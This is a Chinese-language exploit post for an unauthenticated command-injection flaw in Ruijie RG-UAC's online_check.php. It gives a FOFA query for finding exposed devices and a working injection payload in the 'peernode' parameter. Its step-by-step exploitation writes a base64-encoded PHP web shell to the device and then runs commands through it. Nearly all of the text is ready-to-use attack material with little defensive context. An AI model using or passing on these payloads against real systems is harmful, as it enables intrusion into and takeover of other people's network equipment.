【锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】
1. 介绍
锐捷RG-UAC统一上网行为管理审计系统是星网锐捷网络有限公司自主研发的上网行为管理与审计产品。该系统可以部署在网络的关键节点上,通过路由、透明、旁路或混合模式,对数据进行2-7层的全面检查和分析。它深度识别、管控和审计数百种常见的应用,包括IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频、移动应用、网络存储等。
**
2. 网络资产搜索
**
fofa:title="RG-UAC登录页面"
**
3. 存在漏洞的位置
**
GET /view/vpn/autovpn/online_check.php HTTP/1.1
4. poc
payload:GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgcGhwaW5mbygpOw==%20|%20base64%20-d%20%3E%20test.php`
**
5. 利用流程
**
#GET 第一步
https://目标ip/view/vpn/autovpn/online_check.php #返回 code 200 代表漏洞存在
#GET 第二步
https://目标ip/view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20JTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI0X1JFUVVFU1QlNUIlMjd4eDAweHglMjclNUQlMjklM0I=%20|%20base64%20-d%20%3E%20654321.php` #返回 code 200 代表已写入成功
#GET 第三步
https://目标ip/view/vpn/autovpn/654321.php?xx00xx=id #执行命令